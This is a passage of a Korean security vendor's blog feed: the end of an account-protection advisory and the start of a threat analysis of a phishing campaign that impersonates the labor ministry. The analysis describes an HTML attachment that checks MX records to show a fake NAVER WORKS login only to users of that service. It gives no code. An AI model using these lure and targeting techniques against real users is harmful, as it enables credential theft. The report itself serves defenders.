&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;개인 사용자뿐 아니라 기업에도 중요한 경고&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이번 경고는 개인 금융 사고에 국한된 이슈가 아닙니다. 업무용 메일 계정이나 협업 도구 계정이 탈취될 경우, 기업 내부 정보 유출은 물론 거래처 사칭, 송금 사기(BEC) 등으로 이어질 가능성도 큽니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;실제로 글로벌 보안 사고 사례를 보면 개인 계정 탈취가 기업 침해 사고의 출발점이 되는 경우가 점점 늘고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384103.png&quot; data-origin-width=&quot;1024&quot; data-origin-height=&quot;1064&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/syT8e/dJMcahpNuRS/3TKaJPg7fBZI76npQKslWk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/syT8e/dJMcahpNuRS/3TKaJPg7fBZI76npQKslWk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/syT8e/dJMcahpNuRS/3TKaJPg7fBZI76npQKslWk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FsyT8e%2FdJMcahpNuRS%2F3TKaJPg7fBZI76npQKslWk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;600&quot; height=&quot;623&quot; data-filename=&quot;Group 2034384103.png&quot; data-origin-width=&quot;1024&quot; data-origin-height=&quot;1064&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;UAE 사이버보안위원회는 이러한 위협에 대응하기 위해 사용자 행동 중심의 예방 수칙을 강조했습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;공식 채널이 아닌 메시지는 반드시 진위 여부를 확인할 것, &lt;/span&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;계좌와 거래 내역을 주기적으로 모니터링할 것, &lt;/span&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;2단계 인증(2FA)을 활성화할 것, &lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;운영체제와 애플리케이션을 최신 상태로 유지할 것&lt;/b&gt; &lt;/span&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;등이 핵심입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;여기에 &lt;b&gt;실시간 은행 알림 서비스&lt;/b&gt;를 함께 활용하면 의심스러운 거래를 보다 빠르게 인지하고 대응할 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;디지털 전환 시대, 보안 인식이 곧 자산 보호입니다&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;UAE 정부는 이번 경고를 &amp;lsquo;사이버 펄스(Cyber Pulse)&amp;rsquo; 캠페인의 일환으로 발표하며, 디지털 대전환 환경에서 국민의 안전과 프라이버시, 그리고 사이버 회복력을 동시에 강화하는 것이 목표라고 밝혔습니다. 단발성 경고가 아니라, 지속적인 인식 개선과 실천이 결합될 때 안전한 디지털 환경을 만들 수 있다는 점을 분명히 한 것입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;온라인 금융 자산을 노린 공격은 특정 국가나 특정 사용자만의 문제가 아닙니다. 클릭 한 번, 저장된 비밀번호 하나가 예상치 못한 피해로 이어질 수 있는 시대인 만큼, 개인과 조직 모두가 기본적인 보안 수칙을 다시 점검해야 할 시점입니다. 디지털 환경에서의 작은 습관 변화가 가장 확실한 보안 대응이 될 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;2322&quot; data-origin-height=&quot;1510&quot;&gt;&lt;a href=&quot;https://www.estsecurity.com/enterprise/solution/endpoint-security&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bwVxr7/dJMcaaEdA0F/LCOFkv58iCVNIkMcHCasLk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbwVxr7%2FdJMcaaEdA0F%2FLCOFkv58iCVNIkMcHCasLk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;2322&quot; height=&quot;1510&quot; data-origin-width=&quot;2322&quot; data-origin-height=&quot;1510&quot;/&gt;&lt;/a&gt;&lt;figcaption&gt;[위 이미지를 클릭하면 엔드포인트 보안 솔루션으로 이동합니다]&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #006dd7;&quot;&gt;&lt;b&gt;금융 정보 탈취와 계정 도용 공격이 고도화될수록, 개인의 보안 수칙 실천과 함께 기업 차원의 선제적 보안 대응 역시 중요해지고 있습니다.&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt; 이스트시큐리티는 엔드포인트 보안과 위협 인텔리전스 기반 탐지&amp;middot;대응 기술을 바탕으로, 계정 탈취 이후 발생할 수 있는 2차 피해까지 고려한 통합 보안 환경을 제공합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;사용자 보안 인식과 기업 보안 체계가 함께 작동할 때, 비로소 실질적인 금융&amp;middot;정보 자산 보호가 가능해집니다. 이스트시큐리티는 그 연결의 중심에서, 각 기업의 환경과 위협 수준을 면밀히 진단하고 최적의 보안 전략을 함께 설계합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;현재의 보안 체계가 최신 위협 환경에 충분히 대응하고 있는지 점검이 필요하다면, 아래 배너를 클릭하고 기업 맞춤형 무료 보안 컨설팅을 통해 전문가와 함께 현실적인 대응 방안을 확인해 보시기 바랍니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 485151 (3).png&quot; data-origin-width=&quot;996&quot; data-origin-height=&quot;212&quot;&gt;&lt;a href=&quot;https://bit.ly/4nsdIJE&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/wn4l8/dJMcafFvRJa/5zSuOmrttjQJ8P5Mtuul51/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fwn4l8%2FdJMcafFvRJa%2F5zSuOmrttjQJ8P5Mtuul51%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;350&quot; height=&quot;74&quot; data-filename=&quot;Group 485151 (3).png&quot; data-origin-width=&quot;996&quot; data-origin-height=&quot;212&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>EDR</category>
      <category>기업보안</category>
      <category>기업보안솔루션</category>
      <category>사용자보안수칙</category>
      <category>사이버공격</category>
      <category>알약</category>
      <category>엔드포인트보안</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5718</guid>
      <comments>https://alyacofficialblog.tistory.com/5718#entry5718comment</comments>
      <pubDate>Tue, 10 Feb 2026 12:35:50 +0900</pubDate>
    </item>
    <item>
      <title>고용노동부 사칭 피싱 유포 사례 분석 - 이메일 도메인 분석까지 수행하는 &amp;lsquo;정밀 타겟형&amp;rsquo; 공격</title>
      <link>https://alyacofficialblog.tistory.com/5716</link>
      <description>&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/crksro/dJMcaac9hzM/3KVmwl5M2Zt6HmYSk6ECz0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/crksro/dJMcaac9hzM/3KVmwl5M2Zt6HmYSk6ECz0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/crksro/dJMcaac9hzM/3KVmwl5M2Zt6HmYSk6ECz0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcrksro%2FdJMcaac9hzM%2F3KVmwl5M2Zt6HmYSk6ECz0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;692&quot; height=&quot;440&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최근 이스트시큐리티 대응센터&lt;span&gt;(ESRC)&lt;/span&gt;에서 운영 중인&lt;span&gt; APT TDS(Threat Detection System)&lt;/span&gt;를 통해&lt;span&gt;, &lt;/span&gt;네이버웍스 사용자를 겨냥한 고도화된 피싱 공격이 포착되었습니다&lt;span&gt;.&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1032&quot; data-origin-height=&quot;703&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/kB56T/dJMcad1WZ8T/7Mktg2jbyEINBFh3I1mxWk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/kB56T/dJMcad1WZ8T/7Mktg2jbyEINBFh3I1mxWk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/kB56T/dJMcad1WZ8T/7Mktg2jbyEINBFh3I1mxWk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FkB56T%2FdJMcad1WZ8T%2F7Mktg2jbyEINBFh3I1mxWk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1032&quot; height=&quot;703&quot; data-origin-width=&quot;1032&quot; data-origin-height=&quot;703&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번 공격은 단순 유포형 피싱을 넘어 기업의 메일 환경을 식별하는 정밀함을 보이고 있으며&lt;span&gt;, &lt;/span&gt;현재&lt;span&gt; TDS&lt;/span&gt;에 기록된 실시간 탐지 데이타와 연관정보를 토대로 해당 피싱 공격에 대해 분석한 내용을 공유해 드립니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;1.&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;피싱 메일 및 유포 방식&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;피싱 메일은&lt;span&gt; '[&lt;/span&gt;공문&lt;span&gt;/&lt;/span&gt;필수&lt;span&gt;]2027&lt;/span&gt;년 고용노동부 노동정책 포럼 자료 제출 요청&lt;span&gt;' &lt;/span&gt;이라는 제목으로 유포되었습니다&lt;span&gt;.&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;사회공학적 기법&lt;/b&gt;&lt;span&gt;: &lt;/span&gt;메일 본문에 고용노동부&lt;span&gt;(MOEL) &lt;/span&gt;및 공식 협력사를 사칭한 법적 근거와 참조 코드를 명시하여 사용자의 의심을 피합니다&lt;span&gt;. &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span&gt;&lt;b&gt;&lt;span&gt;HTML &lt;/span&gt;&lt;span&gt;첨부파일:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&amp;nbsp;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;'2027&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;년&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;_&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;고용노동부&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;_&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;노동포럼&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;_&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;설문&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;_&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;입력창&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;-(&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;수신자 메일주소&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;)'&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;와 같이 수신자의 메일주소가 포함된&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; HTML&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;파일을 첨부하여 실행을 유도합니다.&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1079&quot; data-origin-height=&quot;1001&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/JrcGv/dJMcaaRLAjN/LYc6QsyxL9DnTKK7zkheQ0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/JrcGv/dJMcaaRLAjN/LYc6QsyxL9DnTKK7zkheQ0/img.png&quot; data-alt=&quot;[그림 2] 피싱 메일 본문&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/JrcGv/dJMcaaRLAjN/LYc6QsyxL9DnTKK7zkheQ0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FJrcGv%2FdJMcaaRLAjN%2FLYc6QsyxL9DnTKK7zkheQ0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1079&quot; height=&quot;1001&quot; data-origin-width=&quot;1079&quot; data-origin-height=&quot;1001&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 2] 피싱 메일 본문&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;2.&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;공격 흐름&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;① HTML &lt;/span&gt;첨부파일 실행 및 이메일 도메인 추출&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;사용자가 첨부된&lt;span&gt; HTML &lt;/span&gt;파일을 공문 파일로 오인하여 실행하면 파일 내부에 포함된 스크립트가 동작하면서 코드에 하드코딩된 사용자 이메일 주소에서 도메인을 추출합니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;②&lt;span&gt; DNS MX &lt;/span&gt;레코드 조회를 통한 네이버웍스 사용자 필터링&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;도메인 추출 후&lt;span&gt; Google &lt;/span&gt;및&lt;span&gt; Cloudflare&lt;/span&gt;의&lt;span&gt; DNS API&lt;/span&gt;를 호출하여 추출된 도메인의&lt;span&gt; MX(Mail Exchanger) &lt;/span&gt;레코드를 조회합니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이후 최우선&lt;span&gt;(priority) MX &lt;/span&gt;서버 문자열에&lt;span&gt; worksmobile(&lt;/span&gt;네이버웍스&lt;span&gt;) &lt;/span&gt;포함 여부를 확인하여 네이버웍스 사용자인지를 판단합니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;MX(Mail&amp;nbsp;Exchanger)&amp;nbsp;레코드란?&lt;/p&gt;
&lt;p style=&quot;margin: 10px 0 0 0;&quot; data-ke-size=&quot;size16&quot;&gt;MX&amp;nbsp;레코드(Mail&amp;nbsp;Exchanger&amp;nbsp;Record)는&amp;nbsp;DNS에서&amp;nbsp;해당&amp;nbsp;도메인의&amp;nbsp;이메일을&amp;nbsp;어디로&amp;nbsp;전달해야&amp;nbsp;하는지&amp;nbsp;알려주는&amp;nbsp;정보입니다. &lt;br /&gt;예를 들어 user@example.com 라는 메일주소로 메일을 보내는 경우 해당 메일주소만으로는 전달될 수 없고 실제 메일을 수신하는 서버 위치를 알아야 전송이 가능합니다. 이때 사용되는 것이 DNS의 MX(Mail Exchanger) 레코드 입니다. &lt;br /&gt;하나의 도메인에는 여러 MX 레코드가 존재할 수 있으며, 각 레코드에는 우선순위(Priority) 값이 설정됩니다. 숫자가 낮을수록 우선 사용되는 최우선 MX 서버를 의미하며, 공격자는 이 서버 문자열을 통해 해당 도메인의 메일 서비스 종류를 식별할 수 있습니다.&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;821&quot; data-origin-height=&quot;649&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ndS3y/dJMcadHErRk/12iIqfNZTzCxJ1skCDIhR0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ndS3y/dJMcadHErRk/12iIqfNZTzCxJ1skCDIhR0/img.png&quot; data-alt=&quot;[그림 3] DNS MX 레코드 조회 및 도메인 검증 코드&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ndS3y/dJMcadHErRk/12iIqfNZTzCxJ1skCDIhR0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FndS3y%2FdJMcadHErRk%2F12iIqfNZTzCxJ1skCDIhR0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;821&quot; height=&quot;649&quot; data-origin-width=&quot;821&quot; data-origin-height=&quot;649&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 3] DNS MX 레코드 조회 및 도메인 검증 코드&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;③ 조건부 로그인 페이지 표시 및 비밀번호 입력 유도&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;네이버웍스 사용자로 확인된 경우에만 공격자가 제작한 로그인 페이지를 표시하여 비밀번호 입력을 유도합니다&lt;span&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;다른 메일 서비스를 사용하는 경우에는 로그인 페이지를 표시하지 않고 빈페이지로 이동시켜 공격을 종료합니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1073&quot; data-origin-height=&quot;797&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bABGav/dJMcajulpo4/Y9TGsIEkj2crRvq5FGOCGk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bABGav/dJMcajulpo4/Y9TGsIEkj2crRvq5FGOCGk/img.png&quot; data-alt=&quot;[그림 4] 로그인 페이지&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bABGav/dJMcajulpo4/Y9TGsIEkj2crRvq5FGOCGk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbABGav%2FdJMcajulpo4%2FY9TGsIEkj2crRvq5FGOCGk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1073&quot; height=&quot;797&quot; data-origin-width=&quot;1073&quot; data-origin-height=&quot;797&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 4] 로그인 페이지&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
